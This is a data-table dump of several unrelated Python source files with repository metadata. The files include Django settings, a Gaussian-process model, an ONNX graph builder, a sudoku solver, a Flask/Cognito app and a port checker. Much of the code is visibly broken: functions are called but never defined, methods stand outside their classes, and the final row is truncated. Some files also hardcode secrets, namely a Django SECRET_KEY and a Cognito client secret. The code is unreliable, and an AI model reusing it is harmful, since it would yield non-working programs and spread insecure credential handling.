hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7738b7fae9ef9456645f45d2e182dbc304825ba1 | 1,573 | py | Python | src/hydro/conf/settings_base.py | aolarchive/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 42 | 2015-03-04T09:05:00.000Z | 2018-12-01T15:13:48.000Z | src/hydro/conf/settings_base.py | aolarchive/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 5 | 2015-05-11T08:18:12.000Z | 2016-03-22T19:11:01.000Z | src/hydro/conf/settings_base.py | Convertro/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 4 | 2015-03-05T09:07:27.000Z | 2018-12-01T15:13:49.000Z | # Hydro settings
TIME_ZONE = 'UTC'
LANGUAGE_CODE = 'en-us'
APPLICATION_NAME = 'HYDRO'
SECRET_KEY = '8lu*6g0lg)9w!ba+a$edk)xx)x%rxgb$i1&022shmi1jcgihb*'
# SESSION_TIMEOUT is used in validate_session_active decorator to see if the
# session is active.
SECOND = 1
MINUTE = SECOND * 60
SECONDS_IN_DAY = SECOND*86400
MYSQL_CACHE_DB = 'cache'
MYSQL_STATS_DB = 'stats'
MYSQL_CACHE_TABLE = 'hydro_cache_table'
CACHE_IN_MEMORY_KEY_EXPIRE = 600
CACHE_DB_KEY_EXPIRE = 86400
USE_STATS_DB = False
DATABASES = {
'stats': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_STATS_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'cache': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_CACHE_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'cache',
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
}
},
}
| 26.661017 | 113 | 0.591863 |
7738eed30266f468e9290a38da24497ebf1d541d | 357 | py | Python | project/Fast/django/decorators/auth.py | fael07/DRF-Project | f65b4177e56e7209d2369ba9d6d81bfe00321052 | [
"MIT"
] | null | null | null | project/Fast/django/decorators/auth.py | fael07/DRF-Project | f65b4177e56e7209d2369ba9d6d81bfe00321052 | [
"MIT"
] | null | null | null | project/Fast/django/decorators/auth.py | fael07/DRF-Project | f65b4177e56e7209d2369ba9d6d81bfe00321052 | [
"MIT"
] | null | null | null | from ...forms.checks import check_is_logged
from django.shortcuts import redirect
| 23.8 | 47 | 0.661064 |
773934d535052c5583666741f88c9dfe16421a75 | 12,000 | py | Python | gp_models.py | deepmind/active_ops | 5c7b24515adadbaf89feb84232190bad96221c04 | [
"Apache-2.0"
] | 13 | 2021-12-03T19:24:11.000Z | 2022-03-17T11:14:11.000Z | gp_models.py | deepmind/active_ops | 5c7b24515adadbaf89feb84232190bad96221c04 | [
"Apache-2.0"
] | 1 | 2022-01-19T06:48:02.000Z | 2022-01-19T06:48:02.000Z | gp_models.py | deepmind/active_ops | 5c7b24515adadbaf89feb84232190bad96221c04 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 DeepMind Technologies Limited.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gaussian process model at discrete indices."""
from typing import Sequence, Union
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
tfk = tfp.math.psd_kernels
def sample(self):
"""Compute marginal log-likelihood and posterior mean and variance."""
index_mask, _, o_mean, o_var, _ = self._merge_observations()
# K + sigma2*I or K + Sigma (with Sigma diagonal) matrix
# where X are training or inducing inputs
k_all_all = self._kernel.matrix(self._xs, self._xs)
k_x_all = tf.boolean_mask(k_all_all, index_mask)
k_xx = tf.boolean_mask(k_x_all, index_mask, axis=1)
k = k_xx + tf.linalg.diag(o_var)
chol = tf.linalg.cholesky(k)
# L^{-1} \mu
a = tf.linalg.triangular_solve(chol, tf.expand_dims(o_mean, 1), lower=True)
# predict at the training inputs X
a2 = tf.linalg.triangular_solve(chol, k_x_all, lower=True)
# posterior mean
post_mean = tf.squeeze(tf.matmul(a2, a, transpose_a=True), axis=1)
post_mean = post_mean + self._offset
# full posterior covariance matrix.
post_var = k_all_all - tf.matmul(a2, a2, transpose_a=True)
mvn = tfd.MultivariateNormalTriL(
loc=post_mean, scale_tril=tf.linalg.cholesky(post_var))
return mvn.sample()
class GaussianProcessWithSideObs(GaussianProcess):
"""Gaussian process model at discrete indices and side observations."""
def __init__(self,
num_indices: int,
kernel: tfk.PositiveSemidefiniteKernel,
offset: Union[float, tf.Tensor, tf.Variable],
variance: Union[float, tf.Tensor, tf.Variable],
side_observations: Sequence[Sequence[float]],
side_observations_variance: Union[float, Sequence[float],
Sequence[Sequence[float]],
tf.Tensor, tf.Variable]):
"""Creates a model for a stochastic process.
Args:
num_indices: integer, the number of discrete indices.
kernel: An instance of
`tfp.positive_semidefinite_kernels.PositiveSemidefiniteKernels`. The
type of the kernel will be used to cast the inputs and outputs of the
model.
offset: Scalar, offset the observations by this amount.
variance: variance of the Gaussian observation noise.
side_observations: [num_side_observation_per_index, num_indices] array of
side observations.
side_observations_variance: side observation variances of the same shape
as side_observations or can be broadcast to the same shape.
"""
super().__init__(num_indices=num_indices,
kernel=kernel,
offset=offset,
variance=variance)
self._zs_var = side_observations_variance
# self._zs is not supposed to change and is treated as constants.
self._zs = tf.constant(side_observations, dtype=self._dtype)
if self._zs.ndim != 2:
raise ValueError('Side observation dimension must be 2.')
if self._zs.shape[1] != num_indices:
raise ValueError('Side observation dimension does not match num_indices.')
def _merge_observations(self):
"""Merge observations and side observations at the same index."""
# Observations.
ys_mean = self._ys_mean - self._offset
ys_var = self._variance # Scalar.
ys_s = self._ys_sq_mean - tf.square(self._ys_mean) # Empirical variance.
# Side observations.
zs = self._zs - self._offset
# Broadcast zs_var to have the same shape as zs.
zs_var = self._zs_var + tf.zeros_like(zs)
o_var = 1. / (tf.reduce_sum(1. / zs_var, axis=0) + self._ys_num / ys_var)
o_mean = (tf.reduce_sum(zs / zs_var, axis=0)
+ self._ys_num / ys_var * ys_mean) * o_var
# Additional likelihood term inside exp(-1/2(.)).
extra_term = -0.5 * tf.reduce_sum(
tf.reduce_sum(tf.square(zs) / zs_var, axis=0)
+ self._ys_num / ys_var * tf.square(ys_mean)
- tf.square(o_mean) / o_var
+ self._ys_num / ys_var * ys_s)
# Additional likelihood term of 1/\sqrt(2\pi * var)
extra_term += -0.5 * (
tf.math.log(2.0 * np.pi) * (
self.n_observations + (zs.shape[0] - 1) * zs.shape[1])
+ tf.reduce_sum(tf.math.log(zs_var))
+ tf.math.log(ys_var) * self.n_observations
- tf.reduce_sum(tf.math.log(o_var)))
# All the indices are returned due to the side observation.
index_mask = tf.ones(self._xs.shape[0], dtype=tf.bool)
xs = self._xs
return index_mask, xs, o_mean, o_var, extra_term
| 37.974684 | 80 | 0.66375 |
7739a64f5308987b56c062ce417f754ae7cdc0bb | 13,476 | py | Python | hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py | vzyrianov/hpvm-autograd | 521cc3b684531548aea75f9fe3cc673aaa4a2e90 | [
"Apache-2.0"
] | null | null | null | hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py | vzyrianov/hpvm-autograd | 521cc3b684531548aea75f9fe3cc673aaa4a2e90 | [
"Apache-2.0"
] | null | null | null | hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py | vzyrianov/hpvm-autograd | 521cc3b684531548aea75f9fe3cc673aaa4a2e90 | [
"Apache-2.0"
] | null | null | null | from collections import defaultdict
from pathlib import Path
from typing import Dict, Iterable, List, Optional, Tuple, Union
import networkx as nx
import onnx
from . import graph_ir as g
from .onnx_attr import get_node_shape, node_attr_to_dict, node_to_shape
PathLike = Union[str, Path]
GraphT = onnx.GraphProto
NodeT = onnx.NodeProto
NodeT.__hash__ = lambda self: id(self)
NodeT.__repr__ = NodeT.__str__ = lambda self: self.name
EmitNodeT = Union[MarkedSubGraph, g.DFGNode]
def def_use(nodes: Iterable) -> Tuple[dict, dict]:
"""Computes def/use relation from a list of node.
This method is duck-typed and operates on any node defining .input and .output.
"""
defs, uses = {}, defaultdict(list)
for n in nodes:
for i, input_ in enumerate(n.input):
uses[input_].append((n, i))
for output in n.output:
defs[output] = n
return defs, uses
def drop_reshape_before_gemm(graph: nx.DiGraph) -> nx.DiGraph:
"""Look for a shape-gather-unsqueeze-concat-reshape chain and replace that with flatten."""
for node in list(graph.nodes):
if node.op_type != "Reshape":
continue
reshape_input, target_shape = sorted_inputs(graph, node)
if not isinstance(target_shape, g.WeightTensor): # Not constant shape, nope
continue
n_gemm = get_next_in_chain(graph, "Gemm", node)
if n_gemm is None:
continue
# Must be an (n-1)-d flatten before gemm
assert list(target_shape.input_data) == [1, -1]
# Connect input of reshape to gemm, then remove reshape
graph.add_edge(reshape_input, n_gemm, index=0)
graph.remove_node(node)
return graph
def get_next_in_chain(
graph: nx.DiGraph, type_: str, node: Optional[NodeT]
) -> Optional[NodeT]:
"""
Get a unique user node of the unique output of Node `node`,
and return it if it has Type `type_`.
"""
if node is None or len(node.output) != 1:
return None # Propagates None; Unique output
users = list(graph.neighbors(node))
if len(users) != 1 or users[0].op_type != type_:
return None # Unique user of the output; Correct type
return users[0]
| 39.519062 | 96 | 0.632755 |
773a004602d8821b5d2db1868127d6d37b7dd480 | 4,435 | py | Python | analysis/plotting/multi_sites.py | jm9e/FL_Pipeline | d9a8c3d3511817418d908b7a94ccd049c60b7b5d | [
"Apache-2.0"
] | null | null | null | analysis/plotting/multi_sites.py | jm9e/FL_Pipeline | d9a8c3d3511817418d908b7a94ccd049c60b7b5d | [
"Apache-2.0"
] | null | null | null | analysis/plotting/multi_sites.py | jm9e/FL_Pipeline | d9a8c3d3511817418d908b7a94ccd049c60b7b5d | [
"Apache-2.0"
] | null | null | null | import csv
import json
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
formats = ['png', 'pdf', 'svg', 'eps']
metrics = [
{'gmetric': 'groc', 'lmetric': 'lroc', 'metric': 'AUC'},
{'gmetric': 'gauc', 'lmetric': 'lauc', 'metric': 'PRAUC'},
]
datasets = [
{'name': 'HCC', 'file': '../../results/evaluation/hcc_multi_sites_100_each.csv'},
{'name': 'ILPD', 'file': '../../results/evaluation/ilpd_multi_sites_100_each.csv'},
{'name': 'LTD', 'file': '../../results/evaluation/tumor_multi_sites_100_each.csv'},
{'name': 'BCD', 'file': '../../results/evaluation/diag_multi_sites_100_each.csv'},
]
for metric in metrics:
gmetric = metric['gmetric']
lmetric = metric['lmetric']
metric = metric['metric']
for ds in datasets:
file = ds['file']
name = ds['name']
title = f'{name} | Multiple Local Models'
stats = {}
xs = ['1', '2', '5', '10', '20', '50', '100']
with open(file, newline='') as csvfile:
data = csv.reader(csvfile, delimiter=';')
headers = next(data)
gauc_idx = headers.index(gmetric)
lauc_idx = headers.index(lmetric)
for row in data:
stat = stats.get(row[1])
if not stat:
stat = {
gmetric: [],
lmetric: [],
}
stats[row[1]] = stat
# xs.append(row[1])
gvals = json.loads(row[gauc_idx])
lvals = json.loads(row[lauc_idx])
stat[gmetric].append(gvals)
if len(lvals) > 0:
stat[lmetric].extend(lvals)
else:
stat[lmetric].append(gvals)
# datainfo = str(len(stats['100'][gmetric]))
# title += ' | ' + datainfo
y_gauc_median = [np.median(stats[x][gmetric]) for x in xs]
y_gauc_q25 = [np.quantile(stats[x][gmetric], 0.25) for x in xs]
y_gauc_q75 = [np.quantile(stats[x][gmetric], 0.75) for x in xs]
y_lauc_median = [np.median(stats[x][lmetric]) for x in xs]
y_lauc_q25 = [np.quantile(stats[x][lmetric], 0.25) for x in xs]
y_lauc_q75 = [np.quantile(stats[x][lmetric], 0.75) for x in xs]
xs = [int(x) for x in xs]
regular_col = '#b0b0b0'
global_col = '#424ef5'
local_col = '#f57542'
alpha_mean = 1.0
alpha_q = 0.25
alpha_area = 0.2
fig = plt.figure(figsize=(6, 4.5))
ax = fig.add_subplot()
ax.hlines(y_gauc_q25[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.hlines(y_gauc_median[0], 1, 100, label='Centralized', colors=[regular_col])
ax.hlines(y_gauc_q75[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.fill_between(xs, y_gauc_q25, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_gauc_q75, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q25, y_lauc_median, color=local_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q75, y_lauc_median, color=local_col, alpha=alpha_area)
ax.plot(xs, y_gauc_q25, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_gauc_median, '.', label='Combined', color=global_col, alpha=alpha_mean)
ax.plot(xs, y_gauc_q75, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_lauc_q25, '_', color=local_col, alpha=alpha_q)
ax.plot(xs, y_lauc_median, '.', label='Local', color=local_col, alpha=alpha_mean)
ax.plot(xs, y_lauc_q75, '_', color=local_col, alpha=alpha_q)
plt.yticks([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
plt.xscale('log')
plt.xticks([1, 2, 5, 10, 20, 50, 100], ['Centralized', '2', '5', '10', '20', '50', '100'])
plt.ylabel(metric)
plt.xlabel('Number of Sites')
plt.legend()
plt.title(title)
for format in formats:
plt.savefig(f'../../results/plots/{name}_{metric}_sites.{format}', format=format, bbox_inches='tight')
| 38.903509 | 118 | 0.521308 |
773a2176b2ba4a1a9a4e1bd585d65e2d15549d01 | 226 | py | Python | HackerRank/CtCI/array_left_rotation.py | mahasak/Practice | 7ed125087b977b034161157830b8e415d52b6ed7 | [
"Unlicense"
] | null | null | null | HackerRank/CtCI/array_left_rotation.py | mahasak/Practice | 7ed125087b977b034161157830b8e415d52b6ed7 | [
"Unlicense"
] | null | null | null | HackerRank/CtCI/array_left_rotation.py | mahasak/Practice | 7ed125087b977b034161157830b8e415d52b6ed7 | [
"Unlicense"
] | null | null | null |
n, k = map(int, raw_input().strip().split(' '))
a = map(int, raw_input().strip().split(' '))
answer = array_left_rotation(a, n, k);
print ' '.join(map(str,answer))
| 25.111111 | 47 | 0.610619 |
773a351110e170920b1633be885fbe44c1c4b850 | 4,127 | py | Python | examples/sudoku/sudoku_cores.py | SRI-CSL/yices2_python_bindings | ff48993b6f620605afce12741f9afede94238627 | [
"MIT"
] | 8 | 2018-09-19T00:42:45.000Z | 2022-03-25T12:22:01.000Z | examples/sudoku/sudoku_cores.py | SRI-CSL/yices2_python_bindings | ff48993b6f620605afce12741f9afede94238627 | [
"MIT"
] | 4 | 2020-06-05T21:44:14.000Z | 2021-12-06T17:24:31.000Z | examples/sudoku/sudoku_cores.py | SRI-CSL/yices2_python_bindings | ff48993b6f620605afce12741f9afede94238627 | [
"MIT"
] | 3 | 2020-07-10T18:15:01.000Z | 2020-12-16T09:50:02.000Z | #!/usr/bin/env python
"""Using unsat cores to give hints."""
from SudokuLib import Puzzle
from Solver import Solver
from yices.Yices import Yices
from yices.Census import Census
puzzle_blank = [
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
#
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
#
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
puzzle_1 = [
[ 0, 6, 0, 0, 0, 8, 0, 7, 3],
[ 0, 0, 2, 0, 0, 0, 0, 4, 0],
[ 5, 0, 0, 0, 6, 0, 0, 0, 0],
#
[ 0, 0, 0, 6, 0, 2, 0, 0, 5],
[ 0, 0, 4, 0, 0, 0, 1, 0, 0],
[ 6, 0, 0, 8, 0, 7, 0, 0, 0],
#
[ 0, 0, 0, 0, 7, 0, 0, 0, 1],
[ 0, 5, 0, 0, 0, 0, 3, 0, 0],
[ 4, 3, 0, 1, 0, 0, 0, 8, 0],
]
# puzzle_2 come from here:
# https://puzzling.stackexchange.com/questions/29/what-are-the-criteria-for-determining-the-difficulty-of-sudoku-puzzle
# where it is claimed to be the "hardest sudoku in the world"
# but in fact is not a valid sudoku since it has more than one solution. tut tut.
# I added it to one of the predefined boards ('escargot') of SudokuSensei and
# it has 29 non isomorphic models (aka solutions).
puzzle_ai_escargot = [
[ 1, 0, 0, 0, 0, 7, 0, 9, 0],
[ 0, 3, 0, 0, 2, 0, 0, 0, 8],
[ 0, 0, 9, 6, 0, 0, 5, 0, 0],
#
[ 0, 0, 5, 3, 0, 0, 9, 0, 0],
[ 0, 1, 0, 0, 8, 0, 0, 0, 2],
[ 6, 0, 0, 0, 0, 4, 0, 0, 0],
#
[ 3, 0, 0, 0, 0, 0, 0, 1, 0],
[ 0, 4, 0, 0, 0, 0, 0, 0, 7],
[ 0, 0, 7, 0, 0, 0, 0, 3, 0],
]
extreme_1 = [
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 2, 0, 0, 7, 1, 5, 0],
[ 4, 0, 0, 0, 0, 9, 3, 0, 6],
#
[ 0, 1, 0, 0, 0, 3, 0, 0, 5],
[ 0, 0, 0, 5, 2, 4, 0, 0, 0],
[ 3, 0, 0, 7, 0, 0, 0, 6, 0],
#
[ 1, 0, 7, 6, 0, 0, 0, 0, 9],
[ 0, 5, 6, 8, 0, 0, 4, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
extreme_2 = [
[ 0, 0, 0, 0, 0, 0, 7, 0, 3],
[ 0, 0, 6, 0, 0, 8, 5, 4, 0],
[ 5, 0, 0, 0, 7, 0, 0, 0, 0],
#
[ 0, 1, 9, 0, 0, 4, 8, 0, 0],
[ 7, 0, 0, 0, 0, 0, 0, 0, 9],
[ 0, 0, 8, 9, 0, 0, 2, 1, 0],
#
[ 0, 0, 0, 0, 5, 0, 0, 0, 2],
[ 0, 5, 7, 3, 0, 0, 1, 0, 0],
[ 4, 0, 3, 0, 0, 0, 0, 0, 0],
]
extreme_3 = [
[ 8, 0, 1, 0, 9, 0, 0, 0, 0],
[ 0, 7, 2, 0, 0, 1, 0, 0, 0],
[ 0, 0, 0, 3, 0, 0, 8, 0, 0],
#
[ 5, 0, 0, 1, 0, 0, 0, 4, 0],
[ 1, 0, 0, 0, 3, 0, 0, 0, 9],
[ 0, 2, 0, 0, 0, 7, 0, 0, 5],
#
[ 0, 0, 5, 0, 0, 2, 0, 0, 0],
[ 0, 0, 0, 4, 0, 0, 5, 9, 0],
[ 0, 0, 0, 0, 8, 0, 4, 0, 3],
]
extreme_4 = [
[ 7, 0, 0, 0, 0, 4, 0, 5, 0],
[ 0, 0, 0, 5, 0, 0, 1, 0, 0],
[ 0, 0, 0, 0, 0, 6, 0, 7, 8],
#
[ 0, 0, 4, 0, 0, 0, 8, 0, 0],
[ 3, 5, 0, 0, 8, 0, 0, 1, 9],
[ 0, 0, 8, 0, 0, 0, 2, 0, 0],
#
[ 5, 4, 0, 1, 0, 0, 0, 0, 0],
[ 0, 0, 6, 0, 0, 5, 0, 0, 0],
[ 0, 8, 0, 9, 0, 0, 0, 0, 1],
]
#https://www.conceptispuzzles.com/index.aspx?uri=info/article/424
hardest = [
[ 8, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 3, 6, 0, 0, 0, 0, 0],
[ 0, 7, 0, 0, 9, 0, 2, 0, 0],
#
[ 0, 5, 0, 0, 0, 7, 0, 0, 0],
[ 0, 0, 0, 0, 4, 5, 7, 0, 0],
[ 0, 0, 0, 1, 0, 0, 0, 3, 0],
#
[ 0, 0, 1, 0, 0, 0, 0, 6, 8],
[ 0, 0, 8, 5, 0, 0, 0, 1, 0],
[ 0, 9, 0, 0, 0, 0, 4, 0, 0],
]
if __name__ == '__main__':
main()
print(Census.dump())
Yices.exit(True)
| 24.565476 | 119 | 0.414587 |
773b69ca25c1ef12c8384954c0ed9f9b031bb82b | 2,715 | py | Python | www/python/src/app.py | Destokado/funpedia | d864ac15c5ed9983d9a1373fad364d2f0ffc66fc | [
"MIT"
] | null | null | null | www/python/src/app.py | Destokado/funpedia | d864ac15c5ed9983d9a1373fad364d2f0ffc66fc | [
"MIT"
] | null | null | null | www/python/src/app.py | Destokado/funpedia | d864ac15c5ed9983d9a1373fad364d2f0ffc66fc | [
"MIT"
] | null | null | null | import os
import flask
import mwoauth
import yaml
from flask import request, Response
app = flask.Flask(__name__)
# Load configuration from YAML file
__dir__ = os.path.dirname(__file__)
app.config.update(
yaml.safe_load(open(os.path.join(__dir__, 'config.yaml'))))
if __name__ == '__main__':
app.run_server(host='0.0.0.0', threaded=True, debug=True)
####APP.ROUTE####
# APPS
from view.home import *
from view.editing_buddy_app import *
from view.storytelling_app import *
from view.duel_app import *
# Others
from view.layouts import *
| 27.989691 | 74 | 0.673665 |
77401bdbe34d3710ff102d672087cc5c7146f27e | 1,817 | py | Python | filter_plugins/general.py | stackhpc/ansible-role-luks | 8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05 | [
"Apache-1.1"
] | 3 | 2020-04-14T19:57:25.000Z | 2021-01-11T09:09:16.000Z | filter_plugins/general.py | stackhpc/ansible-role-luks | 8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05 | [
"Apache-1.1"
] | 4 | 2020-08-12T10:24:25.000Z | 2022-01-17T17:48:28.000Z | filter_plugins/general.py | stackhpc/ansible-role-luks | 8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05 | [
"Apache-1.1"
] | 2 | 2021-06-17T21:57:42.000Z | 2022-02-20T08:02:43.000Z | # Copyright (c) 2020 StackHPC Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from ansible import errors
import jinja2
class FilterModule(object):
"""Utility filters."""
| 28.84127 | 79 | 0.690149 |
77415032b1eca6d95f7e905db147fe61fa6860f9 | 3,864 | py | Python | aws-dev/awsdev8/flaskstart.py | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | 3f76e3d3df6797705b5b30ae574fe678250d5e92 | [
"MIT"
] | 13 | 2020-02-02T13:53:50.000Z | 2022-03-20T19:50:02.000Z | aws-dev/awsdev8/flaskstart.py | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | 3f76e3d3df6797705b5b30ae574fe678250d5e92 | [
"MIT"
] | 2 | 2020-03-29T19:08:04.000Z | 2021-06-02T00:57:44.000Z | aws-dev/awsdev8/flaskstart.py | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | 3f76e3d3df6797705b5b30ae574fe678250d5e92 | [
"MIT"
] | 10 | 2019-12-25T20:42:37.000Z | 2021-11-17T15:19:00.000Z | #!/usr/bin/env python
from flask import Flask, request,Response
import logging
import os
import json
import cognitoHelper as cog
#logging config
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s',level=logging.INFO,datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(__name__)
#globals
MODULE = "section8"
HOST = "0.0.0.0"
PORT = "8080"
PROFILE = "aws-dev"
REGION = "eu-west-2"
PROFILE = "aws-dev"
REGION = "eu-west-2"
COGNITO_CLIENT_ID = "5br85tkg2nmq8nn1v8pk71lkku"
COGNITO_CLIENT_SECRET = "nvob2gmc5qcgak315fncnuau5a25vumhicc8s1m62gkn4q2m4gs"
USER_POOL = "my-app-pool"
#initiliase flask
app = Flask(__name__)
app.secret_key = os.urandom(24)
cidp = cog.create_client(REGION)
def main ():
print('Running:{}'.format(MODULE))
app.run(debug=True)
#app.run(host='0.0.0.0',port=PORT)
app.logger.info('Running:{}'.format(MODULE))
if __name__ == "__main__":
main()
| 32.2 | 116 | 0.607143 |
77438c9d6cdc3cb8fd8940ebf432371649706560 | 4,204 | py | Python | hallo/function.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2018-05-19T22:27:20.000Z | 2018-05-19T22:27:20.000Z | hallo/function.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/function.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | from abc import ABC, abstractmethod
from typing import Set, Type, Optional
from hallo.events import (
EventSecond,
EventMinute,
EventHour,
EventDay,
EventPing,
EventMessage,
EventJoin,
EventLeave,
EventQuit,
EventNameChange,
EventKick,
EventInvite,
EventNotice,
EventMode,
EventCTCP, Event, ServerEvent,
)
def get_passive_events(self) -> Set[Type[Event]]:
"""Returns a list of events which this function may want to respond to in a passive way"""
return set()
def passive_run(self, event: Event, hallo_obj) -> Optional[ServerEvent]:
"""Replies to an event not directly addressed to the bot.
:param event: Event which has called the function
:param hallo_obj: Hallo object which fired the event.
"""
pass
def get_help_name(self) -> str:
"""Returns the name to be printed for help documentation"""
if self.help_name is None:
raise NotImplementedError
return self.help_name
def get_help_docs(self) -> str:
"""
Returns the help documentation, specific to given arguments, if supplied
"""
if self.help_docs is None:
raise NotImplementedError
return self.help_docs
def get_names(self) -> Set[str]:
"""Returns the list of names for directly addressing the function"""
self.names.add(self.help_name)
return self.names
| 36.556522 | 119 | 0.670076 |
774895ccb2d658440364d2b85b233c22dd7dda42 | 4,332 | py | Python | mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py | edmund-troche/mbl-core | 70fd55691301792169fb1feafc2a5e4ba107ee97 | [
"Apache-2.0",
"BSD-3-Clause"
] | 5 | 2019-08-25T06:18:25.000Z | 2020-03-20T14:40:18.000Z | mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py | edmund-troche/mbl-core | 70fd55691301792169fb1feafc2a5e4ba107ee97 | [
"Apache-2.0",
"BSD-3-Clause"
] | 39 | 2019-06-03T14:31:20.000Z | 2020-01-13T09:00:04.000Z | mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py | edmund-troche/mbl-core | 70fd55691301792169fb1feafc2a5e4ba107ee97 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2019-11-29T06:12:35.000Z | 2020-06-17T13:56:39.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 Arm Limited and Contributors. All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
"""This script checks for checker for unwanted TCP/UDP open ports."""
import os
import json
import logging
from enum import Enum
import mbl.open_ports_checker.connection as connection
import mbl.open_ports_checker.netstatutils as nsu
__version__ = "1.0"
| 33.84375 | 78 | 0.629732 |
77499e42f9ca78c74d1e6fe87f05359b0f2d3da1 | 1,036 | py | Python | eval_odom.py | nikola3794/kitti-odom-eval | c808874dc18db3b60b8c711e55546f09af553659 | [
"MIT"
] | 110 | 2019-10-21T02:41:57.000Z | 2022-03-30T20:51:37.000Z | eval_odom.py | nikola3794/kitti-odom-eval | c808874dc18db3b60b8c711e55546f09af553659 | [
"MIT"
